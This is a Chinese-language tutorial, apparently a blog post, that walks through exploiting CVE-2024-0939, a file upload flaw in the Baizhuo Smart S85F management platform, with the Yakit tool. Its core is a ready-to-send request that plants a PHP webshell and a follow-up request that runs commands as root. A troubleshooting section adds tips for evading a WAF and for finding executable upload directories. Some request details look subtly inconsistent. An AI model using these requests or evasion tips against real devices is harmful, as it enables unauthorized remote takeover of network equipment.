,附Yakit实战截图)
实战指南:CVE-2024-0939文件上传漏洞复现与Yakit工具深度解析
在网络安全领域,文件上传漏洞一直是攻击者最常利用的入口点之一。这类漏洞往往由于开发人员对用户上传文件的类型、内容缺乏严格校验而导致。今天我们将聚焦于百卓Smart S85F管理平台中发现的CVE-2024-0939漏洞,通过Yakit工具一步步复现整个攻击过程。
1. 环境准备与工具配置
在开始复现之前,我们需要确保具备以下基础环境:
- 测试环境:建议使用虚拟机搭建的百卓Smart S85F管理平台(版本需存在漏洞)
- 网络配置:确保测试机与目标设备在同一局域网
- 工具准备:
- Yakit最新版本
- Burp Suite(可选,用于辅助分析)
- 文本编辑器(如VS Code或Notepad++)
Yakit基础配置步骤:
# 下载并安装Yakit wget https://yaklang.io/downloads/latest/yakit -O yakit chmod +x yakit ./yakit安装完成后,我们需要对Yakit进行一些基本设置:
- 打开"代理设置",配置监听端口(默认8080)
- 在"插件管理"中安装必要的扩展模块
- 配置浏览器代理指向Yakit监听端口
注意:所有测试应在授权环境下进行,未经授权的测试可能违反法律
2. 漏洞原理深度解析
CVE-2024-0939本质上是一个不安全的文件上传漏洞,位于百卓Smart S85F管理平台的/Tool/uploadfile.php接口。让我们深入分析其技术细节:
漏洞核心问题:
- 缺乏文件类型校验
- 未对文件内容进行安全检查
- 上传路径可预测且可控制
- 无有效的CSRF防护机制
典型攻击流程:
- 攻击者构造恶意请求包
- 上传包含恶意代码的文件(如PHP webshell)
- 通过已知路径访问上传的文件
- 执行任意系统命令
下表对比了安全与不安全文件上传的实现差异:
| 安全措施 | 安全实现 | 不安全实现(本漏洞) |
|---|---|---|
| 文件类型检查 | 白名单校验 | 无校验 |
| 内容扫描 | 病毒/恶意代码扫描 | 无扫描 |
| 存储路径 | 随机生成 | 用户可控 |
| 权限控制 | 最小权限原则 | 可执行权限 |
3. 分步复现过程详解
3.1 定位漏洞接口
首先我们需要找到存在漏洞的上传接口。通过分析设备文档和前端代码,可以确定上传功能位于:
POST /Tool/uploadfile.php使用Yakit构造基础请求:
POST /Tool/uploadfile.php HTTP/1.1 Host: [目标IP] User-Agent: Mozilla/5.0 Accept: */* Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryABC123 Content-Length: [自动计算] ------WebKitFormBoundaryABC123 Content-Disposition: form-data; name="file_upload"; filename="test.txt" Content-Type: text/plain test content ------WebKitFormBoundaryABC123--3.2 构造恶意上传请求
成功定位接口后,我们需要构造能够上传webshell的请求包。以下是关键参数说明:
file_upload:上传文件字段txt_path:指定服务器存储路径filename:可控制的后缀名
完整攻击请求示例:
POST /Tool/uploadfile.php HTTP/1.1 Host: 192.168.1.100 User-Agent: Yakit-Exploit Content-Type: multipart/form-data; boundary=----YakitBoundary123 Content-Length: 328 ----YakitBoundary123 Content-Disposition: form-data; name="file_upload"; filename="shell.php" Content-Type: application/octet-stream <?php system($_GET['cmd']); ?> ----YakitBoundary123 Content-Disposition: form-data; name="txt_path" /home/shell.php ----YakitBoundary123--3.3 验证漏洞利用
上传成功后,通过访问指定路径验证webshell是否生效:
GET /home/shell.php?cmd=id HTTP/1.1 Host: 192.168.1.100预期响应应包含当前用户的权限信息:
{ "output": "uid=0(root) gid=0(root) groups=0(root)" }4. 常见问题排查与技巧
在实际复现过程中,可能会遇到各种问题。以下是常见问题及解决方案:
问题1:上传成功但无法执行
- 可能原因:文件权限不足
- 解决方案:尝试修改上传路径到可执行目录
问题2:返回403禁止访问
- 可能原因:WAF拦截
- 解决方案:
- 修改User-Agent头
- 尝试分块传输编码
- 添加无害头部混淆
Yakit高级技巧:
- 使用"历史请求"功能快速重放修改后的请求
- 利用"编码转换"工具快速生成Base64等编码payload
- 通过"对比响应"功能分析不同参数的影响
效率提升小贴士:
- 将常用攻击请求保存为模板
- 配置快捷键快速发送特定请求
- 使用Yakit的"批量测试"功能自动化检测
在实际测试中,我发现最有效的路径是/var/www/html/uploads/,这个目录通常具有可执行权限。另外,通过添加多个无关表单字段有时可以绕过简单的WAF检测。
